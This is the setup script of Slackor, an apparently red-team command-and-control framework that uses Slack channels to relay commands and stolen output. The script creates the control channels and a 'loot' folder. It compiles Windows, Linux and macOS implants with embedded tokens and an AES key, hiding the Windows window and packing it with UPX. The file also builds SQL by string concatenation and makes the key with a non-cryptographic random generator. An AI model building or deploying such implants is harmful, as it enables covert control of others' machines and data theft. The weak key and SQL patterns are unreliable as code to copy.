github.com/n00py/Slackor@v0.0.0-20200610224921-d007fcea1740/setup.py (about)

     1  import hashlib
     2  import json
     3  import os
     4  import random
     5  import requests
     6  import sqlite3
     7  import subprocess
     8  import sys
     9  
    10  # Initialize variables
    11  commands = None
    12  responses = None
    13  registration = None
    14  
    15  # Create directories
    16  if not os.path.exists("loot"):
    17      os.mkdir("loot")
    18  if not os.path.exists("output"):
    19      os.mkdir("output")
    20  
    21  print("First you must also create a Slack bot.\n"
    22      "Ensure your Slack app has these permissions before you continue:\nBot:\n"
    23      "\nchannels:history\nchannels:read\nchannels:write \nchat:write:\nusers:read\n"
    24      "User:\nchannels:history\nchannels:write\nfiles:read\nfiles:write")
    25  token = input("Enter the OAuth Access Token: ")
    26  bearer = input("Enter the Bot User OAuth Access Token: ")
    27  
    28  print("OAuth Access Token: " + token)
    29  print("Bot User OAuth Access Token: " + bearer)
    30  
    31  print("Attempting to create Slack channels...")
    32  
    33  # Check if channels exist
    34  headers = {'Authorization': 'Bearer ' + bearer}
    35  data = {"token": token, "name": "commands", "validate": "True"}
    36  r = requests.get('https://slack.com/api/channels.list', headers=headers)
    37  result = json.loads(r.text)
    38  for channel in result["channels"]:
    39          if channel["name"] == "commands":
    40              commands = channel["id"]
    41              print("Existing commands channel found")
    42          if channel["name"] == "registration":
    43              registration = channel["id"]
    44              print("Existing registration channel found")
    45          if channel["name"] == "responses":
    46              responses = channel["id"]
    47              print("Existing response channel found")
    48  
    49  # Create channels
    50  headers = {'Authorization': 'Bearer ' + bearer}
    51  if commands is None:
    52      data = {"token": token, "name": "commands", "validate": "True"}
    53      r = requests.post('https://slack.com/api/channels.create', headers=headers, data=data)
    54      result = json.loads(r.text)
    55      try:
    56          commands = result["channel"]["id"]
    57          print("Commands channel: " + commands)
    58      except KeyError:
    59          print(result)
    60          print("Commands channel already exists, log into Slack and delete it manually")
    61          print("Go to: Channel Settings -> Additional Options - > Delete this Channel")
    62          sys.exit()
    63  
    64  if responses is None:
    65      data = {"token": token, "name": "responses"}
    66      r = requests.post('https://slack.com/api/channels.create', headers=headers, data=data)
    67      result = json.loads(r.text)
    68      try:
    69          responses = result["channel"]["id"]
    70          print("Responses channel: " + responses)
    71      except KeyError:
    72          print("Responses channel already exists, log into Slack and delete it manually")
    73          print("Go to: Channel Settings -> Additional Options - > Delete this Channel")
    74          sys.exit()
    75  
    76  if registration is None:
    77      data = {"token": token, "name": "registration"}
    78      r = requests.post('https://slack.com/api/channels.create', headers=headers, data=data)
    79      result = json.loads(r.text)
    80      try:
    81          registration = result["channel"]["id"]
    82          print("Registration channel: " + registration)
    83      except KeyError:
    84          print("Registration channel already exists, log into Slack and delete it manually")
    85          print("Go to: Channel Settings -> Additional Options - > Delete this Channel")
    86          sys.exit()
    87  
    88  # Invite bot user to created channels
    89  data = {"token": token}
    90  r = requests.get('https://slack.com/api/users.list', headers=headers)
    91  result = json.loads(r.text)
    92  slackusers = []
    93  for user in result["members"]:
    94      if user["is_bot"]:
    95          slackusers.append(user["id"])
    96  for channel in [commands, responses, registration]:
    97      data = {"token": token, "channel": channel, "users": ','.join(slackusers)}
    98      r = requests.post('https://slack.com/api/conversations.invite', headers=headers, data=data)
    99      print("Added bot account to channel " + channel)
   100  
   101  # If a database already exists, remove it
   102  try:
   103      os.remove('slackor.db')
   104      print("Deleting current database...")
   105  except OSError:
   106      pass
   107  conn = sqlite3.connect('slackor.db')
   108  print("Creating AES key...")
   109  aes_key = ''.join(random.choice('0123456789ABCDEF') for n in range(32))
   110  print(aes_key)
   111  print("Created new database file...")
   112  print("Putting keys in the database...")
   113  # Create table for  keys
   114  conn.execute('''CREATE TABLE KEYS
   115           (ID TEXT PRIMARY KEY     NOT NULL,
   116           TOKEN           TEXT    NOT NULL,
   117           BEARER           TEXT    NOT NULL,
   118           AES            TEXT     NOT NULL);''')
   119  conn.execute("INSERT INTO KEYS (ID,TOKEN,BEARER,AES) VALUES ('1', '" + token + "','" + bearer + "','" + aes_key + "')")
   120  
   121  print("Adding slack channels to the database...")
   122  
   123  # Create table for channels
   124  conn.execute('''CREATE TABLE CHANNELS
   125           (ID TEXT PRIMARY KEY     NOT NULL,
   126           COMMANDS           TEXT    NOT NULL,
   127           RESPONSES            TEXT     NOT NULL,
   128           REGISTRATION        TEXT);''')
   129  conn.execute("INSERT INTO CHANNELS (ID,COMMANDS,RESPONSES,REGISTRATION) VALUES ('1', '" + commands + "','"
   130               + responses + "','" + registration + "')")
   131  
   132  # Create table for holding agents
   133  conn.execute('''CREATE TABLE AGENTS
   134           (ID TEXT PRIMARY KEY     NOT NULL,
   135           HOSTNAME           TEXT    NOT NULL,
   136           USER           TEXT    NOT NULL,
   137           IP            TEXT     NOT NULL,
   138           VERSION        TEXT);''')
   139  conn.commit()
   140  conn.close()
   141  print("Database created successfully")
   142  
   143  # Build exe and pack with UPX
   144  subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=windows GOARCH=amd64 go build -o dist/agent.windows.exe -ldflags \"-s -w -H windowsgui -X github.com/n00py/Slackor/internal/config.ResponseChannel=%s -X github.com/n00py/Slackor/internal/config.RegistrationChannel=%s -X github.com/n00py/Slackor/internal/config.CommandsChannel=%s -X github.com/n00py/Slackor/internal/config.Bearer=%s -X github.com/n00py/Slackor/internal/config.Token=%s -X github.com/n00py/Slackor/internal/config.CipherKey=%s -X github.com/n00py/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))])
   145  subprocess.run(["bash", "-c", "cp -p dist/agent.windows.exe dist/agent.upx.exe"])
   146  subprocess.run(["bash", "-c", "upx --force dist/agent.upx.exe"])
   147  
   148  # Build for linux and macOS
   149  subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=linux GOARCH=amd64 go build -o dist/agent.64.linux -ldflags \"-s -w -X github.com/n00py/Slackor/internal/config.ResponseChannel=%s -X github.com/n00py/Slackor/internal/config.RegistrationChannel=%s -X github.com/n00py/Slackor/internal/config.CommandsChannel=%s -X github.com/n00py/Slackor/internal/config.Bearer=%s -X github.com/n00py/Slackor/internal/config.Token=%s -X github.com/n00py/Slackor/internal/config.CipherKey=%s -X github.com/n00py/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))])
   150  subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=linux GOARCH=386 go build -o dist/agent.32.linux -ldflags \"-s -w -X github.com/n00py/Slackor/internal/config.ResponseChannel=%s -X github.com/n00py/Slackor/internal/config.RegistrationChannel=%s -X github.com/n00py/Slackor/internal/config.CommandsChannel=%s -X github.com/n00py/Slackor/internal/config.Bearer=%s -X github.com/n00py/Slackor/internal/config.Token=%s -X github.com/n00py/Slackor/internal/config.CipherKey=%s -X github.com/n00py/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))])
   151  subprocess.run(["bash", "-c", "GO111MODULE=on GOOS=darwin GOARCH=amd64 go build -o dist/agent.darwin -ldflags \"-s -w -X github.com/n00py/Slackor/internal/config.ResponseChannel=%s -X github.com/n00py/Slackor/internal/config.RegistrationChannel=%s -X github.com/n00py/Slackor/internal/config.CommandsChannel=%s -X github.com/n00py/Slackor/internal/config.Bearer=%s -X github.com/n00py/Slackor/internal/config.Token=%s -X github.com/n00py/Slackor/internal/config.CipherKey=%s -X github.com/n00py/Slackor/internal/config.SerialNumber=%s\" agent.go" % (responses, registration, commands, bearer, token, aes_key, '%0128x' % random.randrange(16**128))])
   152  
   153  # Print hashes
   154  filenames = ["dist/agent.windows.exe", "dist/agent.upx.exe", "dist/agent.64.linux", "dist/agent.32.linux", "dist/agent.darwin"]
   155  for filename in filenames:
   156      # TODO: use buffers/hash update if the agent ever gets big
   157      f = open(filename, 'rb').read()
   158      h = hashlib.sha256(f).hexdigest()
   159      print(h + "  " + filename)